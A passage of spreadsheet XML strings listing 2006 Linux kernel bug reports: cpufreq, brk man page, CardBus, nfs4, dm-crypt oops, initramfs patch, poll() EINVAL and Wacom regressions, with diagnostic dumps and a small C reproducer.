    <t>S.Caglar Onur</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: Pardus Linux, Alpha 3 Hardware Environment: Sony Vaio VGN-FS215B Notebook Software Environment: Problem Description: Ondemand or conservative governors couldnWt change current frequency of CPU while system is idle with 2.6.18, 2.6.18.1, 2.6.19-r1 kernels. 2.6.16 works fine without any problem. As a workaround unplug/plug ac adapter magically solves the problem and these governors start to run as expected. In ordet to be sure this problem is kernel related, all userspace softwares which capable of powermanagent are stopped (hal/powersave etc.) acpidump, /proc/cpuinfo, dmesg output, dmidecode output, lsmod output, top, ps output and CONFIG will follow this report as attachments Whole LKML thread can be found @ http://www.gossamer-threads.com/lists/linux/kernel/692970</t>
  </si>
  <si>
    <t>brk manpage has incorrect information about return value of brk syscall</t>
  </si>
  <si>
    <t>2006-10-17 18:45 UTC</t>
  </si>
  <si>
    <t>Evan Teran</t>
  </si>
  <si>
    <t>2006-11-24 21:10 UTC</t>
  </si>
  <si>
    <t>I was not sure who I should report this too since it's in a man page, and I'm not sure who maintains it so i figured I'd try here. Anyway, I beleive that the brk manpage has incorrect information about return value of the brk syscall. It says: "On success, brk() returns zero, and sbrk() returns a pointer to the start of the new area. On error, -1 is returned, and errno is set to ENOMEM." However looking at the code for sys_brk, the last 3 lines indicate to me that the return value is not 0 on success, but instead it returns the new brk value (which is WAY more useful). out: retval = mm-&gt;brk; up_write(&amp;mm-&gt;mmap_sem); return retval; Also the man page fails to mention that 0 (or looking at the code, any value less than the end of the code region will return the current brk value, also very useful to a libc developer. if (brk &lt; mm-&gt;end_code) goto out; So basically, it seems that in practice brk seems to work much more like the sbrk implemented in user space, the only major difference being that it takes an absolute value to set the brk to, and not an amount to increase it by. This should be reflected in the man page since this information is vital to properly implementing user space dynamic memory allocators. Evan Teran</t>
  </si>
  <si>
    <t>cpu frequency switching seems to be broken (on Intel Conroe 6600), frequencies being shown are wrong</t>
  </si>
  <si>
    <t>2.6.19-rc4-mm2</t>
  </si>
  <si>
    <t>2006-10-18 01:53 UTC</t>
  </si>
  <si>
    <t>Matthew</t>
  </si>
  <si>
    <t>2011-07-30 05:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.19-rc2 Distribution: GNU/Gentoo Linux Hardware Environment: Intel Conroe 6600 (Core 2 Duo), Asus P5W DH Deluxe Software Environment: x86, powernowd, gnome Problem Description: frequencies being displayed aren't correct, frequency switching doesn't seem to work: it stays at the highest frequency: 2.6 GHz Steps to reproduce: start in system, frequency switching: userspace, start powernowd cat scaling_available_frequencies 2394000 1596000 1 0 33554432 0 -1339546588 -1339546588 -313505024 -407094144 cat cpuinfo_max_freq 3981462272 cat cpuinfo_min_freq 0 cat scaling_driver acpi-cpufreq can this harm hardware ?</t>
  </si>
  <si>
    <t>Error allocating mem resources [CardBus]</t>
  </si>
  <si>
    <t>2006-10-18 12:33 UTC</t>
  </si>
  <si>
    <t>Alvaro Arranz Garcia</t>
  </si>
  <si>
    <t>2007-02-21 15:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Kernels tested: 2.6.17, 2.6.18, Debian 2.6.18-1-686 Hardware: Satellite Pro M70 + Pinnacle PCTV Hybrid Pro Card dmesg (I will attach full output in next message): BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d2000 - 00000000000d4000 (reserved) BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000005fee0000 (usable) BIOS-e820: 000000005fee0000 - 000000005feea000 (ACPI data) BIOS-e820: 000000005feea000 - 000000005ff00000 (ACPI NVS) BIOS-e820: 000000005ff00000 - 0000000060000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000f0006000 (reserved) BIOS-e820: 00000000f0008000 - 00000000f000c000 (reserved) BIOS-e820: 00000000fed20000 - 00000000fed90000 (reserved) BIOS-e820: 00000000ff000000 - 0000000100000000 (reserved) 638MB HIGHMEM available. 896MB LOWMEM available. ... pnp: PnP ACPI init pnp: PnP ACPI: found 9 devices PnPBIOS: Disabled by ACPI PNP PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report pnp: 00:01: ioport range 0xfe00-0xfe7f has been reserved pnp: 00:01: ioport range 0xfe80-0xfeff has been reserved pnp: 00:01: ioport range 0xff00-0xff7f has been reserved PCI: Bridge: 0000:00:01.0 IO window: 3000-3fff MEM window: b8100000-b81fffff PREFETCH window: c8000000-cfffffff PCI: Bridge: 0000:00:1c.0 IO window: 4000-4fff MEM window: bc000000-bfffffff PREFETCH window: d0000000-d3ffffff PCI: Bridge: 0000:00:1c.1 IO window: 5000-5fff MEM window: c0000000-c3ffffff PREFETCH window: d4000000-d7ffffff PCI: Bus 7, cardbus bridge: 0000:06:04.0 IO window: 00006400-000064ff IO window: 00006800-000068ff PREFETCH window: 68000000-69ffffff MEM window: 6a000000-6bffffff PCI: Bridge: 0000:00:1e.0 IO window: 6000-6fff MEM window: c4000000-c40fffff PREFETCH window: 68000000-69ffffff ... pccard: CardBus card inserted into slot 0 PCI: Failed to allocate mem resource #0:1000000@6c000000 for 0000:07:00.2 Linux video capture interface: v2.00 ... cat /proc/iomem (after card insert): 00000000-0009f7ff : System RAM 00000000-00000000 : Crash kernel 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cffff : Video ROM 000d0000-000d0fff : Adapter ROM 000d2000-000d3fff : reserved 000f0000-000fffff : System ROM 00100000-5fedffff : System RAM 00100000-0027f97d : Kernel code 0027f97e-0030f7b3 : Kernel data 5fee0000-5fee9fff : ACPI Tables 5feea000-5fefffff : ACPI Non-volatile Storage 5ff00000-5fffffff : reserved 68000000-69ffffff : PCI Bus #06 68000000-69ffffff : PCI CardBus #07 6a000000-6bffffff : PCI CardBus #07 b8000000-b80003ff : 0000:00:1d.7 b8000000-b80003ff : ehci_hcd b8000400-b80004ff : 0000:00:1e.2 b8000400-b80004ff : Intel ICH6 b8000800-b80009ff : 0000:00:1e.2 b8000800-b80009ff : Intel ICH6 b8000c00-b8000fff : 0000:00:1f.2 b8000c00-b8000fff : ahci b8100000-b81fffff : PCI Bus #01 b8100000-b810ffff : 0000:01:00.0 b8120000-b813ffff : 0000:01:00.0 bc000000-bfffffff : PCI Bus #02 c0000000-c3ffffff : PCI Bus #03 c4000000-c40fffff : PCI Bus #06 c4000000-c4003fff : 0000:06:04.2 c4004000-c4005fff : 0000:06:04.3 c4006000-c40060ff : 0000:06:01.0 c4006000-c40060ff : 8139too c4006400-c40064ff : 0000:06:04.4 c4006400-c40064ff : sdhci:slot2 c4006800-c4006fff : 0000:06:04.2 c4006800-c4006fff : ohci1394 c4007000-c4007fff : 0000:06:02.0 c4007000-c4007fff : ipw2200 c4008000-c4008fff : 0000:06:04.0 c4008000-c4008fff : yenta_socket c4009000-c40090ff : 0000:06:04.4 c4009000-c40090ff : sdhci:slot1 c4009400-c40094ff : 0000:06:04.4 c4009400-c40094ff : sdhci:slot0 c8000000-cfffffff : PCI Bus #01 c8000000-cfffffff : 0000:01:00.0 d0000000-d3ffffff : PCI Bus #02 d4000000-d7ffffff : PCI Bus #03 e0000000-f0005fff : reserved f0008000-f000bfff : reserved fed20000-fed8ffff : reserved ff000000-ffffffff : reserved lspci -vvxx (I will attach full output in next message): ... 06:04.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller Subsystem: Toshiba America Info Systems Unknown device ff00 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 169 Region 0: Memory at c4008000 (32-bit, non-prefetchable) [size=4K] Bus: primary=06, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 68000000-69fff000 (prefetchable) Memory window 1: 6a000000-6bfff000 I/O window 0: 00006400-000064ff I/O window 1: 00006800-000068ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt- PostWrite+ 16-bit legacy interface ports at 0001 00: 4c 10 31 80 07 00 10 02 00 00 07 06 08 a8 82 00 10: 00 80 00 c4 a0 00 00 22 06 07 0a b0 00 00 00 68 20: 00 f0 ff 69 00 00 00 6a 00 f0 ff 6b 00 64 00 00 30: fc 64 00 00 00 68 00 00 fc 68 00 00 0a 01 00 05 40: 79 11 00 ff 01 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... 07:00.0 Multimedia video controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder (rev 05) Subsystem: Yuan Yuan Enterprise Co., Ltd. Unknown device 1788 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (5000ns min, 13750ns max) Interrupt: pin A routed to IRQ 169 Region 0: Memory at 6a000000 (32-bit, non-prefetchable) [size=16M] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: f1 14 00 88 06 00 90 02 05 00 00 04 00 40 80 00 10: 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 ab 12 88 17 30: 00 00 00 00 44 00 00 00 00 00 00 00 a9 01 14 37 07:00.1 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [Audio Port] (rev 05) Subsystem: Yuan Yuan Enterprise Co., Ltd. Unknown device 1788 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (1000ns min, 63750ns max) Interrupt: pin A routed to IRQ 169 Region 0: Memory at 6b000000 (32-bit, non-prefetchable) [size=16M] Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: f1 14 01 88 06 00 90 02 05 00 80 04 00 40 80 00 10: 00 00 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 ab 12 88 17 30: 00 00 00 00 4c 00 00 00 00 00 00 00 a9 01 04 ff 07:00.2 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [MPEG Port] (rev 05) Subsystem: Yuan Yuan Enterprise Co., Ltd. Unknown device 1788 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 169 Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: f1 14 02 88 00 00 90 02 05 00 80 04 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 ab 12 88 17 30: 00 00 00 00 4c 00 00 00 00 00 00 00 a9 01 06 58</t>
  </si>
  <si>
    <t>nfs4 broken in vanilla-sources 2.6.19</t>
  </si>
  <si>
    <t>vanilla-sources 2.6.19</t>
  </si>
  <si>
    <t>2006-10-19 06:31 UTC</t>
  </si>
  <si>
    <t>Huemi</t>
  </si>
  <si>
    <t>2006-10-19 08:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: gentoo (vanilla_sources) Hardware Environment: Software Environment: nfs-utils 1.0.10, vanilla-sources 2.6.19 Problem Description: It is not possible to mount a nfs4 export. It fails with the error message can't read superblock. Steps to reproduce: install gentoo with vanilla-sources 2.6.19_rc1 or rc2 and nfs-utils 1.0.10 and unmask the necessary dependencies entries in /etc/export /export *(rw,fsid=0,insecure,no_subtree_check,sync) /export/bla *(rw,nohide,root_squash,insecure,no_subtree_check,async) /export/user *(rw,nohide,root_squash,insecure,no_subtree_check,async /export and /export/bla have group and owner root and chmod 0777 commands: modprobe nfs /etc/init.d/nfs start /etc/init.d/nfsmount start mount -t nfs4 127.0.0.1:/bla /bla Watch the computer hanging and then responding with an error in /var/log/messages that the server wouldn't respond and mount responding with "... can't read superblock". The problem I had why I tested the kernel was that it is possible to read and write files on an nfs4 mount as a normal user having none permissions (chmod 0000) but owning the file. But I can't test it on kernel 2.6.19 because I can't mount nfs4 exports.</t>
  </si>
  <si>
    <t>Oops in kcryptd</t>
  </si>
  <si>
    <t>2.6.18.1</t>
  </si>
  <si>
    <t>2006-10-19 17:07 UTC</t>
  </si>
  <si>
    <t>Bjoern B. Brandenburg</t>
  </si>
  <si>
    <t>2007-12-04 23:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Don't know, never seen before. So I'd have to say: 2.6.18 Distribution: Arch Linux Hardware Environment: Toshiba S2410 Software Environment: The command cryptsetup luksOpen /dev/loop0 otp triggered the Oops. The process is now defunct and unkillable. I've been using LUKS for about two months and have never witnessed this. System was under moderate load at the same time (KDE starting up, after a cold boot, thus lots of hdd activity). Underlying file system XFS. Problem Description: Process cryptsetup got stuck in kernel space, cannot be killed. Kernel dumps Oops to console: Oct 20 01:53:35 DS-12 device-mapper: ioctl: 4.7.0-ioctl (2006-06-24) initialised: dm-devel@redhat.com Oct 20 01:53:40 DS-12 BUG: unable to handle kernel paging request at virtual address 90eddaf9 Oct 20 01:53:40 DS-12 printing eip: Oct 20 01:53:40 DS-12 c015022e Oct 20 01:53:40 DS-12 *pde = 00000000 Oct 20 01:53:40 DS-12 Oops: 0002 [#1] Oct 20 01:53:40 DS-12 PREEMPT SMP Oct 20 01:53:40 DS-12 Modules linked in: sha256 aes dm_crypt dm_mod rfcomm hidp l2cap bluetooth xfs ext2 prism54 ppdev pcmcia eepro100 lp snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device e100 mii yenta_socket rsrc_nonstatic pcmcia_core snd_pcm_oss snd_mixer_oss tsdev joydev ohci1394 ieee1394 smsc_ircc2 irda crc_ccitt parport_pc parport snd_intel8x0 snd_intel8x0m snd_ac97_codec snd_ac97_bus snd_pcm snd_timer rtc psmouse serio_raw snd soundcore intel_agp uhci_hcd snd_page_alloc agpgart shpchp pci_hotplug pcspkr evdev usbcore ext3 jbd mbcache ide_cd cdrom ide_disk generic piix ide_core Oct 20 01:53:40 DS-12 CPU: 0 Oct 20 01:53:40 DS-12 EIP: 0060:[&lt;c015022e&gt;] Not tainted VLI Oct 20 01:53:40 DS-12 EFLAGS: 00010093 (2.6.18-ARCH #1) Oct 20 01:53:40 DS-12 EIP is at add_element+0xe/0x30 Oct 20 01:53:40 DS-12 eax: 00302d6d ebx: da2cb80e ecx: 642f6b63 edx: d9520718 Oct 20 01:53:40 DS-12 esi: 00000202 edi: d9520718 ebp: dc1f0240 esp: d9f0def8 Oct 20 01:53:40 DS-12 ds: 007b es: 007b ss: 0068 Oct 20 01:53:40 DS-12 Process kcryptd/0 (pid: 3000, ti=d9f0c000 task=dff60570 task.ti=d9f0c000) Oct 20 01:53:40 DS-12 Stack: da2cb80e c015038b dc1f0240 e0ff3080 d9520718 d9f0df24 e108c748 c176c600 Oct 20 01:53:40 DS-12 0000007c 00000000 00000000 c176c600 c176c600 00000000 00000000 00000001 Oct 20 01:53:40 DS-12 00000001 0000007d 00000000 00000000 d9520724 d9520728 dd7604c0 d9520718 Oct 20 01:53:40 DS-12 Call Trace: Oct 20 01:53:40 DS-12 [&lt;c015038b&gt;] mempool_free+0x5b/0x90 Oct 20 01:53:40 DS-12 [&lt;e108c748&gt;] kcryptd_do_work+0x58/0x70 [dm_crypt] Oct 20 01:53:40 DS-12 [&lt;c0135ffb&gt;] run_workqueue+0x7b/0xf0 Oct 20 01:53:40 DS-12 [&lt;e108c6f0&gt;] kcryptd_do_work+0x0/0x70 [dm_crypt] Oct 20 01:53:40 DS-12 [&lt;c0136be7&gt;] worker_thread+0x117/0x140 Oct 20 01:53:40 DS-12 [&lt;c011de00&gt;] default_wake_function+0x0/0x10 Oct 20 01:53:40 DS-12 [&lt;c0136ad0&gt;] worker_thread+0x0/0x140 Oct 20 01:53:40 DS-12 [&lt;c0139937&gt;] kthread+0xf7/0x100 Oct 20 01:53:40 DS-12 [&lt;c0139840&gt;] kthread+0x0/0x100 Oct 20 01:53:40 DS-12 [&lt;c0101005&gt;] kernel_thread_helper+0x5/0x10 Oct 20 01:53:40 DS-12 Code: 40 0c 85 c0 7e 0b 8b 51 10 48 89 41 0c 8b 04 82 c3 0f 0b 1a 00 9c f7 34 c0 eb eb 89 f6 53 89 c3 8b 48 0c 3b 48 08 7d 0e 8b 43 10 &lt;89&gt; 14 88 8d 41 01 89 43 0c 5b c3 0f 0b 14 00 9c f7 34 c0 eb e8 Oct 20 01:53:40 DS-12 EIP: [&lt;c015022e&gt;] add_element+0xe/0x30 SS:ESP 0068:d9f0def8 Oct 20 01:53:40 DS-12 &lt;6&gt;note: kcryptd/0[3000] exited with preempt_count 1 Steps to reproduce: Don't know, never witnessed before.</t>
  </si>
  <si>
    <t>SATA disk doesn't power off while shutdown</t>
  </si>
  <si>
    <t>2.6.17-10</t>
  </si>
  <si>
    <t>2006-10-21 07:36 UTC</t>
  </si>
  <si>
    <t>Gert</t>
  </si>
  <si>
    <t>2007-06-18 09:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15-27 Distribution: Ubuntu Edgy Hardware Environment: Toshiba Satellite M100, Dell Inspiron 6400, Fujitsu Siemens V3205 Software Environment: Ubuntu Edgy Problem Description: While the system powers off, I hear a sound like in the case of disk failure. The disk isn't powered off before the laptop 's completely powered off. When the power 's cut, I can hear a little "tzzzzzzzzzzzzzzk" (not so nice) sound. More information about this bug can you find on https://launchpad.net/distros/ubuntu/+source/linux-source-2.6.17/+bug/63937</t>
  </si>
  <si>
    <t>initramfs gen script can not handle more than one source</t>
  </si>
  <si>
    <t>2006-10-22 19:41 UTC</t>
  </si>
  <si>
    <t>2006-11-25 16:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: Hardware Environment: Software Environment: Problem Description: the current initramfs gen script can not handle more than one source. eg, "source_dir1 source_dir2 source_list_file3" . The quotaion marks caused the problem. the "-l" option to generate deps list need fix,too. patch to fix this issue, Index: usr/Makefile =================================================================== --- usr/Makefile (revision 1) +++ usr/Makefile (working copy) @@ -18,7 +18,7 @@ hostprogs-y := gen_init_cpio initramfs := $(CONFIG_SHELL) $(srctree)/scripts/gen_initramfs_list.sh ramfs-input := $(if $(filter-out "",$(CONFIG_INITRAMFS_SOURCE)), \ - $(CONFIG_INITRAMFS_SOURCE),-d) + $(shell echo $(CONFIG_INITRAMFS_SOURCE)),-d) ramfs-args := \ $(if $(CONFIG_INITRAMFS_ROOT_UID), -u $(CONFIG_INITRAMFS_ROOT_UID)) \ $(if $(CONFIG_INITRAMFS_ROOT_GID), -g $(CONFIG_INITRAMFS_ROOT_GID)) Index: scripts/gen_initramfs_list.sh =================================================================== --- scripts/gen_initramfs_list.sh (revision 1) +++ scripts/gen_initramfs_list.sh (working copy) @@ -158,7 +158,7 @@ } list_header() { - echo "deps_initramfs := \\" + return 0; } header() { @@ -227,6 +227,7 @@ case "$arg" in "-l") # files included in initramfs - used by kbuild dep_list="list_" + echo "deps_initramfs := \\" shift ;; "-o") # generate gzipped cpio image named $1 Steps to reproduce:</t>
  </si>
  <si>
    <t>transparent bridge report</t>
  </si>
  <si>
    <t>2006-10-22 22:05 UTC</t>
  </si>
  <si>
    <t>2008-05-02 09:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu edgy Hardware Environment: Acer TM 8000 series, Pentium M 2Ghz As asked in dmesg I post a report</t>
  </si>
  <si>
    <t>poll() returns EINVAL</t>
  </si>
  <si>
    <t>2006-10-23 04:00 UTC</t>
  </si>
  <si>
    <t>Gereon Steffens</t>
  </si>
  <si>
    <t>2008-03-05 15:39 UTC</t>
  </si>
  <si>
    <t>Problem Description: when poll() ist called with more than 1024 fds to check, but only 1024 fds are acually open, it returns EINVAL. This can occur if one or more fds are duplicated in the struct pollfd array, e.g. when there are separate entries for POLLIN and POLLOUT. Steps to reproduce: run this program: #include &lt;sys/poll.h&gt; #include &lt;errno.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; int main(int argc, char**argv) { struct pollfd pfd[2000] = { { 0 } }; int i, rc; int fd = 0; /* open files until we have 1024 fds in use */ for (i=0; fd &lt; 1023; ++i) { fd = dup(1); pfd[i].fd = fd; pfd[i].events = POLLOUT; pfd[i].revents = 0; } for (; i&lt;1026; ++i) { /* add dups to pfd until we have 1025 entries */ pfd[i].fd = fd; pfd[i].events = POLLIN; pfd[i].revents = 0; } /* poll chokes on this */ rc = poll(pfd, i, 0); printf("poll rc=%d errno=%d %s\n", rc, errno, strerror(errno)); return 0; }</t>
  </si>
  <si>
    <t>2010-10-08 18:18 UTC</t>
  </si>
  <si>
    <t>acpi_acpica-core@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Wacom Volito2 stopped working from kernel version 2.6.15-r7 (Gentoo Distro)</t>
  </si>
  <si>
    <t>2.6.16-r7 thro 2.6.18-r1</t>
  </si>
  <si>
    <t>2006-10-24 12:48 UTC</t>
  </si>
  <si>
    <t>Alan Edwards</t>
  </si>
  <si>
    <t>2007-02-18 09:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.15-r7 Distribution: Gentoo 2005.0 upgraded to 2006.1 Hardware Environment: AMD 64 3500+ Software Environment:Portage 2.1.1-r1 (default-linux/amd64/2005.0, gcc-4.1.1, glibc-2.4-r3, 2.6.17-gentoo-r8 x86_64) Problem Description: I am running a Gentoo Linux distribution and have successfully used the Wacom Volito2 tablet upto and including the 2.6.15-r7 kernel by following the steps at http://forums.gentoo.org/viewtopic-p-2478951.html#2478951. After upgrading to successive kernels (2.6.16-r7, 2.6.17-r4 and currently 2.6.17-r8), the tablet does not work. In all cases, I have copied my kernel config and have the following options set in the kernel config file: CONFIG_USB_WACOM=m CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=m CONFIG_USB_EHCI_HCD=m CONFIG_USB_OHCI_HCD=m CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y CONFIG_USB_SERIAL=m Reproducible: Always Steps to Reproduce: When I run kernel 2.6.15-r7, dmesg produces: usb 3-2: new low speed USB device using uhci_hcd and address 2 input Wacom Volito2 4x5 as /class/input/input2 wacdump /dev/input/wacom also works ok. When I run kernel 2.6.17-r8, dmesg produces: usb 3-2: new low speed USB device using uhci_hcd and address 2 usb 3-2: configuration #1 chosen from 1 choice input Wacom Volito2 4x5 as /class/input/input2 wacdump /dev/input/wacom does not work. Expected Results: When wacdump is working (under the 2.6.15 kernel, I invoke wacdump with wacdump /dev/input/wacom and get: MODEL=Wacom Volito2 4x5 ROM=2.0-0 CLS=USB VNDR=Wacom DEV=Volito2 SUB=CTF-420-U TOOLTYPE=PEN IN_PROX=in BUTTON=+00000 (+00000 .. +00000) POS_X=+04157 (+00000 .. +05104) POS_Y=+01572 (+00000 .. +03712) DISTANCE=+00000 (+00000 .. +00032) PRESSURE=+00000 (+00000 .. +00511) RELWHEEL=+00000 (-00001 .. +00001) LEFT= MIDDLE= RIGHT= EXTRA= SIDE= TOUCH= STYLUS= STYLUS2= BT0= BT1= BT2= BT3= BT4= BT5= BT6= BT7= BT8= BT9= BT10= BT11= BT12= BT13= BT14= BT15= BT16= BT17= BT18= BT19= BT20= BT21= BT22= BT23= When I invoke the same command under the later kernels, I get: MODEL=Wacom Volito2 4x5 ROM=2.0-0 CLS=USB VNDR=Wacom DEV=Volito2 SUB=CTF-420-U TOOLTYPE=NONE IN_PROX=out BUTTON=+00000 (+00000 .. +00000) POS_X=+00000 (+00000 .. +05104) POS_Y=+00000 (+00000 .. +03712) DISTANCE=+00000 (+00000 .. +00032) PRESSURE=+00000 (+00000 .. +00511) RELWHEEL=+00000 (-00001 .. +00001) LEFT= MIDDLE= RIGHT= EXTRA= SIDE= TOUCH= STYLUS= STYLUS2= BT0= BT1= BT2= BT3= BT4= BT5= BT6= BT7= BT8= BT9= BT10= BT11= BT12= BT13= BT14= BT15= BT16= BT17= BT18= BT19= BT20= BT21= BT22= BT23= Note: the pen is not recognised and there is no co-ordinate information. Here is ls -l /dev/input (under 2.6.18-r1): crw------- 1 root root 13, 64 Oct 21 12:15 event0 crw------- 1 root root 13, 65 Oct 21 12:15 event1 crw-rw---- 1 root root 13, 66 Oct 21 12:21 event2 crw-r--r-- 1 root root 13, 63 Oct 21 12:15 mice crw-r--r-- 1 root root 13, 32 Oct 21 12:15 mouse0 crw-r--r-- 1 root root 13, 33 Oct 21 12:21 mouse1 lrwxrwxrwx 1 root root 6 Oct 21 12:21 wacom -&gt; event2 And here is cat /proc/bus/input/devices (under 2.6.18-r1): I: Bus=0011 Vendor=0001 Product=0001 Version=ab41 N: Name="AT Translated Set 2 keyboard" P: Phys=isa0060/serio0/input0 S: Sysfs=/class/input/input0 H: Handlers=kbd event0 B: EV=120013 B: KEY=402000000 3802078f840d001 feffffdfffefffff fffffffffffffffe B: MSC=10 B: LED=7 I: Bus=0011 Vendor=0002 Product=0005 Version=0000 N: Name="ImPS/2 Generic Wheel Mouse" P: Phys=isa0060/serio1/input0 S: Sysfs=/class/input/input1 H: Handlers=mouse0 event1 B: EV=7 B: KEY=70000 0 0 0 0 B: REL=103 I: Bus=0003 Vendor=056a Product=0062 Version=0200 N: Name="Wacom Volito2 4x5" P: Phys= S: Sysfs=/class/input/input2 H: Handlers=mouse1 event2 B: EV=f B: KEY=1c43 70000 0 0 0 0 B: REL=100 B: ABS=10003000003 Searching the Gentoo forums, I have discovered that there is a workaround which consists of copying the following two files from the /usr/portage/distfiles/linuxwacom-0.7.4-3 to /usr/src/linux/drivers/usb/input and recompiling the modules: hid-core.c wacom.c I have put the original versions (which don't work) at the following link with .old extensions and the files which do work with the original .c extension http://homepage.ntlworld.com/alan.edwards793/Linux/ Here is my lsusb output on the currently running 2.6.17-r8 kernel: # lsusb -v Bus 005 Device 002: ID 0424:20fc Standard Microsystems Corp. 6-in-1 Card Reader Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x0424 Standard Microsystems Corp. idProduct 0x20fc 6-in-1 Card Reader bcdDevice 1.25 iManufacturer 1 SMSC iProduct 2 USB 2 Flash Media Device iSerial 3 0301297000E5 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 39 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 MaxPower 96mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 6 SCSI bInterfaceProtocol 80 Bulk (Zip) iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 1 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 UNRECOGNIZED: 07 21 07 e8 03 fe ff Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Bus 005 Device 001: ID 0000:0000 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 1 Single TT bMaxPacketSize0 64 idVendor 0x0000 idProduct 0x0000 bcdDevice 2.06 iManufacturer 3 Linux 2.6.17-gentoo-r8 ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:10.4 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 